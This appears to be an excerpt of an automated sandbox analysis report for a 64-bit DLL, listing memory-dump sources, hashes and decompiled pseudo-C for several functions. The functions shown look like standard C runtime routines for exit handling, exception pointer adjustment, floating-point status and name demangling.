                                                                      • Opcode Fuzzy Hash: 475c58edfddfd9c9d2ffec819a6ca437ebfa5e36f994d03e35e10d097f2dfab3
                                                                      • Instruction Fuzzy Hash: 22219535315F4890EAA6DB1694143A533A4EB4CFF4F198336AE2D47BD0DF38D6499301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 54853be1bc51f33c9405f6d2a71f046a7c5a485fd14febfd79b95464ce2b89c5
                                                                      • Instruction ID: 29b829011da5b5d2a580de61c5334f76f122d12e6b455fdd3bcd0909512b23b8
                                                                      • Opcode Fuzzy Hash: 54853be1bc51f33c9405f6d2a71f046a7c5a485fd14febfd79b95464ce2b89c5
                                                                      • Instruction Fuzzy Hash: 79F06271205A0C91FBA28B24E8443AA6320FB8E7E1F548316F56A566F4CF2DC34DC300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E0000000118000FC94(signed int __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed char* __r8, signed char* __r9, long long _a8, long long _a16, long long _a24) {
                                                                      				intOrPtr _v40;
                                                                      				void* _t39;
                                                                      				void* _t41;
                                                                      				void* _t84;
                                                                      				long long _t88;
                                                                      				long long _t100;
                                                                      				long long* _t121;
                                                                      				signed char* _t131;
                                                                      
                                                                      				_t84 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __rdi;
                                                                      				_t131 = __r9;
                                                                      				if (__r8[4] == 0) goto 0x8000fcd0;
                                                                      				E0000000118000F1DC(__rax);
                                                                      				goto 0x8000fcd6;
                                                                      				r15d = 0;
                                                                      				if (__rdi == 0) goto 0x8000fe56;
                                                                      				if (r15d == 0) goto 0x8000fcf5;
                                                                      				E0000000118000F1DC(_t84);
                                                                      				goto 0x8000fcf8;
                                                                      				if ( *((intOrPtr*)(__rdi + 0x10)) == dil) goto 0x8000fe56;
                                                                      				if (__r8[8] != 0) goto 0x8000fd0f;
                                                                      				if ( *__r8 >= 0) goto 0x8000fe56;
                                                                      				if ( *__r8 < 0) goto 0x8000fd1d;
                                                                      				_t121 = __r8[8] +  *__rdx;
                                                                      				if (( *__r8 & 0x00000080) == 0) goto 0x8000fd54;
                                                                      				if (( *__r9 & 0x00000010) == 0) goto 0x8000fd54;
                                                                      				_t88 =  *0x800712e8; // 0x0
                                                                      				if (_t88 == 0) goto 0x8000fd54;
                                                                      				_t39 =  *0x8005d348();
                                                                      				if (_t88 == 0) goto 0x8000fe72;
                                                                      				if (_t121 == 0) goto 0x8000fe72;
                                                                      				 *_t121 = _t88;
                                                                      				goto 0x8000fdb3;
                                                                      				if (( *__r8 & 0x00000008) == 0) goto 0x8000fd74;
                                                                      				_t100 =  *((intOrPtr*)(__rcx + 0x28));
                                                                      				if (_t100 == 0) goto 0x8000fe77;
                                                                      				if (_t121 == 0) goto 0x8000fe77;
                                                                      				 *_t121 = _t100;
                                                                      				goto 0x8000fdb3;
                                                                      				if (( *__r9 & 0x00000001) == 0) goto 0x8000fdc4;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x8000fe7c;
                                                                      				if (_t121 == 0) goto 0x8000fe7c;
                                                                      				E00000001180003FF0();
                                                                      				if (__r9[0x14] != 8) goto 0x8000fe52;
                                                                      				if ( *_t121 == __rdi) goto 0x8000fe52;
                                                                      				E00000001180005034(_t39,  *_t121,  &(__r9[8]));
                                                                      				 *_t121 = _t88;
                                                                      				goto 0x8000fe52;
                                                                      				if ( *((intOrPtr*)(_t131 + 0x18)) == 0) goto 0x8000fdd9;
                                                                      				_t41 = E0000000118000F1F0(_t88);
                                                                      				goto 0x8000fdde;
                                                                      				if (__rdi != 0) goto 0x8000fe17;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x8000fe81;
                                                                      				if (_t121 == 0) goto 0x8000fe81;
                                                                      				E00000001180005034(_t41,  *((intOrPtr*)(__rcx + 0x28)), _t131 + 8);
                                                                      				E00000001180003FF0();
                                                                      				goto 0x8000fe52;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x8000fe86;
                                                                      				if (_t121 == 0) goto 0x8000fe86;
                                                                      				if (0 == 0) goto 0x8000fe37;
                                                                      				E0000000118000F1F0(_t88);
                                                                      				goto 0x8000fe3a;
                                                                      				if (__rdi == 0) goto 0x8000fe86;
                                                                      				asm("sbb ecx, ecx");
                                                                      				_v40 =  ~__ecx + 1;
                                                                      				goto 0x8000fe58;
                                                                      				return 0;
                                                                      			}











                                                                      0x18000fc94
                                                                      0x18000fc94
                                                                      0x18000fc99
                                                                      0x18000fc9e
                                                                      0x18000fcad
                                                                      0x18000fcbf
                                                                      0x18000fcc5
                                                                      0x18000fcce
                                                                      0x18000fcd3
                                                                      0x18000fcd9
                                                                      0x18000fce2
                                                                      0x18000fce4
                                                                      0x18000fcf3
                                                                      0x18000fcfc
                                                                      0x18000fd05
                                                                      0x18000fd09
                                                                      0x18000fd11
                                                                      0x18000fd1a
                                                                      0x18000fd20
                                                                      0x18000fd26
                                                                      0x18000fd28
                                                                      0x18000fd32
                                                                      0x18000fd34
                                                                      0x18000fd3d
                                                                      0x18000fd46
                                                                      0x18000fd4c
                                                                      0x18000fd52
                                                                      0x18000fd57
                                                                      0x18000fd59
                                                                      0x18000fd60
                                                                      0x18000fd69
                                                                      0x18000fd6f
                                                                      0x18000fd72
                                                                      0x18000fd78
                                                                      0x18000fd81
                                                                      0x18000fd8a
                                                                      0x18000fd97
                                                                      0x18000fda1
                                                                      0x18000fdaa
                                                                      0x18000fdb7
                                                                      0x18000fdbc
                                                                      0x18000fdbf
                                                                      0x18000fdc8
                                                                      0x18000fdce
                                                                      0x18000fdd7
                                                                      0x18000fde1
                                                                      0x18000fde7
                                                                      0x18000fdf0
                                                                      0x18000fe02
                                                                      0x18000fe10
                                                                      0x18000fe15
                                                                      0x18000fe1b
                                                                      0x18000fe20
                                                                      0x18000fe24
                                                                      0x18000fe26
                                                                      0x18000fe35
                                                                      0x18000fe3d
                                                                      0x18000fe46
                                                                      0x18000fe4e
                                                                      0x18000fe54
                                                                      0x18000fe71

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: bee437d82b39daae6d418a07537aa9a1b2506fad2a5b00177fc3f0bacf658703
                                                                      • Instruction ID: fc6034a22908f688ef5197ce798b0b8a7610584b8b5c8f0fb389adf4d11cf4f4
                                                                      • Opcode Fuzzy Hash: bee437d82b39daae6d418a07537aa9a1b2506fad2a5b00177fc3f0bacf658703
                                                                      • Instruction Fuzzy Hash: 96B18132206A8C81EBF7DB15D5407F97390AB4CBC4F19C436BE894BB96DF64C68A9300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 31%
                                                                      			E0000000118005A27C(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, signed int _a8, long long _a16, signed int _a32) {
                                                                      				signed short _v90;
                                                                      				unsigned int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				char _v104;
                                                                      				void* _t43;
                                                                      				signed short _t44;
                                                                      				unsigned int _t48;
                                                                      				unsigned int _t49;
                                                                      				void* _t51;
                                                                      				signed int _t56;
                                                                      				signed int _t62;
                                                                      				signed int _t63;
                                                                      				void* _t71;
                                                                      				unsigned int _t72;
                                                                      				signed int _t81;
                                                                      				signed int _t82;
                                                                      				void* _t85;
                                                                      				signed int _t86;
                                                                      				void* _t87;
                                                                      				void* _t88;
                                                                      				signed int _t90;
                                                                      				void* _t91;
                                                                      				signed int _t102;
                                                                      				signed long long _t106;
                                                                      				void* _t116;
                                                                      				void* _t117;
                                                                      				void* _t124;
                                                                      
                                                                      				_t122 = __r8;
                                                                      				_a16 = __rbx;
                                                                      				asm("movaps [esp+0x40], xmm6");
                                                                      				asm("movaps [esp+0x30], xmm7");
                                                                      				_t56 = __ecx & 0x0000001f;
                                                                      				_v100 = _t56;
                                                                      				_t3 = _t116 + 0x10; // 0x10
                                                                      				r15d = _t3;
                                                                      				r12d = __ecx;
                                                                      				if ((__ecx & 0x00000008) == 0) goto 0x8005a2cc;
                                                                      				if (r13b >= 0) goto 0x8005a2cc;
                                                                      				E0000000118005AA7C(_t56, __rcx);
                                                                      				_t57 = _t56 & 0xfffffff7;
                                                                      				goto 0x8005a52e;
                                                                      				_t81 = 0x00000004 & r12b;
                                                                      				if (_t81 == 0) goto 0x8005a2ea;
                                                                      				asm("dec ecx");
                                                                      				if (_t81 >= 0) goto 0x8005a2ea;
                                                                      				E0000000118005AA7C(_t56 & 0xfffffff7, __rcx);
                                                                      				goto 0x8005a52e;
                                                                      				_t82 = sil & r12b;
                                                                      				if (_t82 == 0) goto 0x8005a3ad;
                                                                      				asm("dec ecx");
                                                                      				if (_t82 >= 0) goto 0x8005a3ad;
                                                                      				_t43 = E0000000118005AA7C(_t57 & 0xfffffffb, __rcx);
                                                                      				_t106 = __r8 & __rcx;
                                                                      				if (_t82 == 0) goto 0x8005a378;
                                                                      				if (_t106 == 0x2000) goto 0x8005a35f;
                                                                      				if (_t106 == 0x4000) goto 0x8005a346;
                                                                      				_t85 = _t106 - __rcx;
                                                                      				if (_t85 != 0) goto 0x8005a3a5;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe416]");
                                                                      				asm("movsd xmm0, [0xe43e]");
                                                                      				if (_t85 > 0) goto 0x8005a3a0;
                                                                      				goto 0x8005a399;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe3fd]");
                                                                      				if (_t85 > 0) goto 0x8005a387;
                                                                      				asm("movsd xmm0, [0xe423]");
                                                                      				goto 0x8005a399;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe3e4]");
                                                                      				if (_t85 <= 0) goto 0x8005a391;
                                                                      				asm("movsd xmm0, [0xe40a]");
                                                                      				goto 0x8005a3a0;
                                                                      				asm("movsd xmm0, [ebp]");
                                                                      				asm("comisd xmm0, [0xe3cb]");
                                                                      				if (_t85 <= 0) goto 0x8005a391;
                                                                      				asm("movsd xmm0, [0xe3e1]");
                                                                      				goto 0x8005a3a0;
                                                                      				asm("movsd xmm0, [0xe3d7]");
                                                                      				asm("xorps xmm0, [0xe3c0]");
                                                                      				asm("movsd [ebp], xmm0");
                                                                      				goto 0x8005a52e;
                                                                      				_t86 = r12b & 0x00000002;
                                                                      				if (_t86 == 0) goto 0x8005a52e;
                                                                      				asm("dec ecx");
                                                                      				if (_t86 >= 0) goto 0x8005a52e;
                                                                      				asm("movsd xmm0, [edx]");
                                                                      				r14d = r12d;
                                                                      				r14d = r14d >> 4;
                                                                      				asm("xorps xmm7, xmm7");
                                                                      				r14d = r14d & 0x00000001;
                                                                      				asm("ucomisd xmm0, xmm7");
                                                                      				if (_t86 != 0) goto 0x8005a3df;
                                                                      				if (_t86 == 0) goto 0x8005a523;
                                                                      				_t44 = E0000000118005AB9C(_t43, _t86,  &_v104);
                                                                      				_t71 = _v104 + 0xfffffa00;
                                                                      				asm("movsd [esp+0x28], xmm0");
                                                                      				_t87 = _t71 - 0xfffffbce;
                                                                      				if (_t87 >= 0) goto 0x8005a410;
                                                                      				asm("mulsd xmm0, xmm7");
                                                                      				r14d = 1;
                                                                      				asm("movaps xmm6, xmm0");
                                                                      				goto 0x8005a519;
                                                                      				r9d = 0;
                                                                      				asm("comisd xmm7, xmm0");
                                                                      				r8b = dil;
                                                                      				_a8 = dil;
                                                                      				r9b = _t87 > 0;
                                                                      				_v90 = _t44 & 0x0000000f | r15w;
                                                                      				_a32 = dil;
                                                                      				_t88 = _t71 - 0xfffffc03;
                                                                      				if (_t88 >= 0) goto 0x8005a4a5;
                                                                      				_t48 = _v96;
                                                                      				_t72 = _v92;
                                                                      				_a32 = _t48 & 0x00000001;
                                                                      				if (_t88 == 0) goto 0x8005a474;
                                                                      				r8b = sil;
                                                                      				r14d =  ==  ? 1 : r14d;
                                                                      				_t49 = _t48 >> 1;
                                                                      				_v96 = _t49;
                                                                      				_t90 = sil & _t72;
                                                                      				if (_t90 == 0) goto 0x8005a487;
                                                                      				asm("bts eax, 0x1f");
                                                                      				_v96 = _t49;
                                                                      				if (_t90 != 0) goto 0x8005a45d;
                                                                      				_t62 = _v100;
                                                                      				_v92 = _t72 >> 1;
                                                                      				_a8 = r8b;
                                                                      				asm("movsd xmm6, [esp+0x28]");
                                                                      				_t91 = r9d;
                                                                      				if (_t91 == 0) goto 0x8005a4bd;
                                                                      				asm("xorps xmm6, [0xe2a9]");
                                                                      				asm("movsd [esp+0x28], xmm6");
                                                                      				asm("comisd xmm7, xmm0");
                                                                      				r15b = _t91 > 0;
                                                                      				if (_a32 != 0) goto 0x8005a4ce;
                                                                      				if (r8b == 0) goto 0x8005a513;
                                                                      				_t51 = E0000000118005060C(_v96 >> 0x30, __rcx, _t122);
                                                                      				if (_t51 == 0) goto 0x8005a4ed;
                                                                      				if (_t51 == 0x100) goto 0x8005a4e8;
                                                                      				if (_t51 != 0x200) goto 0x8005a513;
                                                                      				r15b = r15b ^ sil;
                                                                      				goto 0x8005a506;
                                                                      				if (_a32 == dil) goto 0x8005a513;
                                                                      				if (_a8 != dil) goto 0x8005a508;
                                                                      				if ((_v96 & sil) == 0) goto 0x8005a513;
                                                                      				_v96 = _v96 + _t117;
                                                                      				asm("movsd xmm6, [esp+0x28]");
                                                                      				r15d = 0x10;
                                                                      				asm("movsd [ebp], xmm6");
                                                                      				if (r14d == 0) goto 0x8005a52b;
                                                                      				E0000000118005AA7C(_t62, _t124);
                                                                      				_t63 = _t62 & 0xfffffffd;
                                                                      				_t102 = r15b & r12b;
                                                                      				if (_t102 == 0) goto 0x8005a547;
                                                                      				asm("dec ecx");
                                                                      				if (_t102 >= 0) goto 0x8005a547;
                                                                      				E0000000118005AA7C(_t63, _t124);
                                                                      				asm("movaps xmm6, [esp+0x40]");
                                                                      				asm("movaps xmm7, [esp+0x30]");
                                                                      				dil = (_t63 & 0xffffffef) == 0;
                                                                      				return 0;
                                                                      			}































                                                                      0x18005a27c
                                                                      0x18005a27c
                                                                      0x18005a292
                                                                      0x18005a299
                                                                      0x18005a29e
                                                                      0x18005a2a4
                                                                      0x18005a2ab
                                                                      0x18005a2ab
                                                                      0x18005a2af
                                                                      0x18005a2b5
                                                                      0x18005a2ba
                                                                      0x18005a2bf
                                                                      0x18005a2c4
                                                                      0x18005a2c7
                                                                      0x18005a2d1
                                                                      0x18005a2d4
                                                                      0x18005a2d6
                                                                      0x18005a2db
                                                                      0x18005a2dd
                                                                      0x18005a2e5
                                                                      0x18005a2ef
                                                                      0x18005a2f2
                                                                      0x18005a2f8
                                                                      0x18005a2fd
                                                                      0x18005a306
                                                                      0x18005a313
                                                                      0x18005a316
                                                                      0x18005a31e
                                                                      0x18005a326
                                                                      0x18005a328
                                                                      0x18005a32b
                                                                      0x18005a32d
                                                                      0x18005a332
                                                                      0x18005a33a
                                                                      0x18005a342
                                                                      0x18005a344
                                                                      0x18005a346
                                                                      0x18005a34b
                                                                      0x18005a353
                                                                      0x18005a355
                                                                      0x18005a35d
                                                                      0x18005a35f
                                                                      0x18005a364
                                                                      0x18005a36c
                                                                      0x18005a36e
                                                                      0x18005a376
                                                                      0x18005a378
                                                                      0x18005a37d
                                                                      0x18005a385
                                                                      0x18005a387
                                                                      0x18005a38f
                                                                      0x18005a391
                                                                      0x18005a399
                                                                      0x18005a3a0
                                                                      0x18005a3a8
                                                                      0x18005a3ad
                                                                      0x18005a3b1
                                                                      0x18005a3b7
                                                                      0x18005a3bc
                                                                      0x18005a3c2
                                                                      0x18005a3c6
                                                                      0x18005a3c9
                                                                      0x18005a3cd
                                                                      0x18005a3d0
                                                                      0x18005a3d3
                                                                      0x18005a3d7
                                                                      0x18005a3d9
                                                                      0x18005a3e4
                                                                      0x18005a3ed
                                                                      0x18005a3f3
                                                                      0x18005a3f9
                                                                      0x18005a3ff
                                                                      0x18005a401
                                                                      0x18005a405
                                                                      0x18005a408
                                                                      0x18005a40b
                                                                      0x18005a415
                                                                      0x18005a418
                                                                      0x18005a41c
                                                                      0x18005a41f
                                                                      0x18005a427
                                                                      0x18005a437
                                                                      0x18005a43f
                                                                      0x18005a446
                                                                      0x18005a44c
                                                                      0x18005a44e
                                                                      0x18005a459
                                                                      0x18005a461
                                                                      0x18005a468
                                                                      0x18005a46d
                                                                      0x18005a470
                                                                      0x18005a474
                                                                      0x18005a476
                                                                      0x18005a47a
                                                                      0x18005a47d
                                                                      0x18005a47f
                                                                      0x18005a483
                                                                      0x18005a48c
                                                                      0x18005a48e
                                                                      0x18005a499
                                                                      0x18005a49d
                                                                      0x18005a4a5
                                                                      0x18005a4ab
                                                                      0x18005a4ae
                                                                      0x18005a4b0
                                                                      0x18005a4b7
                                                                      0x18005a4bd
                                                                      0x18005a4c1
                                                                      0x18005a4c7
                                                                      0x18005a4cc
                                                                      0x18005a4ce
                                                                      0x18005a4d5
                                                                      0x18005a4dc
                                                                      0x18005a4e3
                                                                      0x18005a4e5
                                                                      0x18005a4eb
                                                                      0x18005a4f5
                                                                      0x18005a4ff
                                                                      0x18005a506
                                                                      0x18005a508
                                                                      0x18005a50d
                                                                      0x18005a513
                                                                      0x18005a519
                                                                      0x18005a521
                                                                      0x18005a526
                                                                      0x18005a52b
                                                                      0x18005a52e
                                                                      0x18005a531
                                                                      0x18005a533
                                                                      0x18005a538
                                                                      0x18005a53f
                                                                      0x18005a547
                                                                      0x18005a556
                                                                      0x18005a55b
                                                                      0x18005a570

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 5f4058c8a8b38e8d025364b2709205e8f05f294421cb4caa9849ac64ece5ffad
                                                                      • Instruction ID: a3a69338805eca6ecf0623057e30d9ca7c5111c15212d69954bfac610068d350
                                                                      • Opcode Fuzzy Hash: 5f4058c8a8b38e8d025364b2709205e8f05f294421cb4caa9849ac64ece5ffad
                                                                      • Instruction Fuzzy Hash: F3819132508A4C89F7F38E35A4503EA6760FB5E3D8F14C315BA9A36595EF36C7898B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E000000011800090E8(void* __edx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, long long __r14) {
                                                                      				void* _v8;
                                                                      				char _v24;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				intOrPtr _v64;
                                                                      				char _v72;
                                                                      				void* _t31;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				signed int _t36;
                                                                      				signed int _t37;
                                                                      				void* _t40;
                                                                      				void* _t54;
                                                                      				char* _t65;
                                                                      				char* _t66;
                                                                      				char _t78;
                                                                      				long long* _t85;
                                                                      				void* _t92;
                                                                      
                                                                      				_t54 = _t92;
                                                                      				 *((long long*)(_t54 + 8)) = __rbx;
                                                                      				 *((long long*)(_t54 + 0x10)) = __rsi;
                                                                      				 *((long long*)(_t54 + 0x18)) = __rdi;
                                                                      				 *((long long*)(_t54 + 0x20)) = __r14;
                                                                      				r14d = 0;
                                                                      				_t85 = __rcx;
                                                                      				_t65 =  *0x80071308; // 0x0
                                                                      				sil = __edx;
                                                                      				if ( *_t65 != 0x51) goto 0x80009127;
                                                                      				_t66 = _t65 + 1;
                                                                      				 *0x80071308 = _t66;
                                                                      				_t78 =  *_t66;
                                                                      				if (__edx != 0) goto 0x80009142;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                                      				 *__rcx = 0x8005f780;
                                                                      				goto 0x80009215;
                                                                      				_t6 = _t78 - 0x30; // -48
                                                                      				if (_t6 - 9 > 0) goto 0x800091a6;
                                                                      				 *0x80071308 = _t66 + 1;
                                                                      				if (1 == 0) goto 0x8000918e;
                                                                      				_t7 = _t78 - 0x2f; // -47
                                                                      				E00000001180005B90(_t7,  &_v56, _t7, __rsi, __r10);
                                                                      				E000000011800059CC(0x8005f780,  &_v40, 0x800700c0);
                                                                      				_t31 = E00000001180005F48(0x8005f780,  &_v72, 0x8005f780);
                                                                      				goto 0x8000919b;
                                                                      				E00000001180005B90(_t31,  &_v24,  &_v72 - 0x2f, __rsi, __r10);
                                                                      				 *_t85 = _v72;
                                                                      				goto 0x80009212;
                                                                      				_t34 = E0000000118000D230(_t40,  &_v72,  &_v72 - 0x2f);
                                                                      				if (_v64 == r14b) goto 0x800091f2;
                                                                      				 *0x80071308 =  *0x80071308 + 1;
                                                                      				if (sil == 0) goto 0x800091df;
                                                                      				if (1 == 0) goto 0x800091d4;
                                                                      				_t35 = E00000001180005AE8(_t34,  &_v24, _v72, __rsi, __r11);
                                                                      				goto 0x80009166;
                                                                      				_t36 = E00000001180005AE8(_t35,  &_v56, _v72, __rsi, __r11);
                                                                      				goto 0x8000919b;
                                                                      				if (1 == 0) goto 0x800091ec;
                                                                      				goto 0x80009161;
                                                                      				goto 0x80009196;
                                                                      				_t59 =  !=  ? __r14 : 0x8005f780;
                                                                      				 *_t85 =  !=  ? __r14 : 0x8005f780;
                                                                      				asm("sbb eax, eax");
                                                                      				_t37 = _t36 & 0x00000002;
                                                                      				 *(_t85 + 8) = _t37;
                                                                      				return _t37;
                                                                      			}





















                                                                      0x1800090e8
                                                                      0x1800090eb
                                                                      0x1800090ef
                                                                      0x1800090f3
                                                                      0x1800090f7
                                                                      0x180009103
                                                                      0x180009106
                                                                      0x180009109
                                                                      0x180009110
                                                                      0x180009119
                                                                      0x18000911b
                                                                      0x180009120
                                                                      0x180009127
                                                                      0x18000912d
                                                                      0x180009136
                                                                      0x18000913a
                                                                      0x18000913d
                                                                      0x180009142
                                                                      0x180009147
                                                                      0x18000914c
                                                                      0x180009155
                                                                      0x180009157
                                                                      0x180009161
                                                                      0x180009174
                                                                      0x180009183
                                                                      0x18000918c
                                                                      0x180009196
                                                                      0x1800091a1
                                                                      0x1800091a4
                                                                      0x1800091aa
                                                                      0x1800091b3
                                                                      0x1800091b5
                                                                      0x1800091c3
                                                                      0x1800091c7
                                                                      0x1800091cd
                                                                      0x1800091d2
                                                                      0x1800091d8
                                                                      0x1800091dd
                                                                      0x1800091e1
                                                                      0x1800091e7
                                                                      0x1800091f0
                                                                      0x180009204
                                                                      0x18000920a
                                                                      0x18000920d
                                                                      0x18000920f
                                                                      0x180009212
                                                                      0x180009231

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: NameName::$Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 826178784-0
                                                                      • Opcode ID: 954e50de57e7f6c52a7e7990d70177fa92607e95154cf0786634b43ede04b9b2
                                                                      • Instruction ID: dc6dacfc886d82a36c5bc1d572fcc0b805e2bed65cc2f5ecee994ed639fe826c
                                                                      • Opcode Fuzzy Hash: 954e50de57e7f6c52a7e7990d70177fa92607e95154cf0786634b43ede04b9b2
                                                                      • Instruction Fuzzy Hash: 8C416532702B5998EB92CB61D8943E937B4F35DBC0F948012FA8913795DF38CA59C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E00000001180058DB8(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                      				signed int _t27;
                                                                      				signed int _t28;
                                                                      				signed int _t29;
                                                                      				signed int _t30;
                                                                      				signed int _t31;
                                                                      				signed int _t42;
                                                                      				signed int _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t46;
                                                                      				void* _t51;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_t27 = __ecx & 0x0000001f;
                                                                      				if ((__ecx & 0x00000008) == 0) goto 0x80058dea;
                                                                      				if (sil >= 0) goto 0x80058dea;
                                                                      				E0000000118005AA7C(_t27, _t51);
                                                                      				_t28 = _t27 & 0xfffffff7;
                                                                      				goto 0x80058e41;
                                                                      				_t42 = 0x00000004 & dil;
                                                                      				if (_t42 == 0) goto 0x80058e05;
                                                                      				asm("dec eax");
                                                                      				if (_t42 >= 0) goto 0x80058e05;
                                                                      				E0000000118005AA7C(_t28, _t51);
                                                                      				_t29 = _t28 & 0xfffffffb;
                                                                      				goto 0x80058e41;
                                                                      				_t43 = dil & 0x00000001;
                                                                      				if (_t43 == 0) goto 0x80058e21;
                                                                      				asm("dec eax");
                                                                      				if (_t43 >= 0) goto 0x80058e21;
                                                                      				E0000000118005AA7C(_t29, _t51);
                                                                      				_t30 = _t29 & 0xfffffffe;
                                                                      				goto 0x80058e41;
                                                                      				_t44 = dil & 0x00000002;
                                                                      				if (_t44 == 0) goto 0x80058e41;
                                                                      				asm("dec eax");
                                                                      				if (_t44 >= 0) goto 0x80058e41;
                                                                      				if ((dil & 0x00000010) == 0) goto 0x80058e3e;
                                                                      				E0000000118005AA7C(_t30, _t51);
                                                                      				_t31 = _t30 & 0xfffffffd;
                                                                      				_t46 = dil & 0x00000010;
                                                                      				if (_t46 == 0) goto 0x80058e5b;
                                                                      				asm("dec eax");
                                                                      				if (_t46 >= 0) goto 0x80058e5b;
                                                                      				E0000000118005AA7C(_t31, _t51);
                                                                      				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                      			}













                                                                      0x180058db8
                                                                      0x180058dbd
                                                                      0x180058dcc
                                                                      0x180058dd4
                                                                      0x180058dd9
                                                                      0x180058de0
                                                                      0x180058de5
                                                                      0x180058de8
                                                                      0x180058def
                                                                      0x180058df2
                                                                      0x180058df4
                                                                      0x180058df9
                                                                      0x180058dfb
                                                                      0x180058e00
                                                                      0x180058e03
                                                                      0x180058e05
                                                                      0x180058e09
                                                                      0x180058e0b
                                                                      0x180058e10
                                                                      0x180058e17
                                                                      0x180058e1c
                                                                      0x180058e1f
                                                                      0x180058e21
                                                                      0x180058e25
                                                                      0x180058e27
                                                                      0x180058e2c
                                                                      0x180058e32
                                                                      0x180058e39
                                                                      0x180058e3e
                                                                      0x180058e41
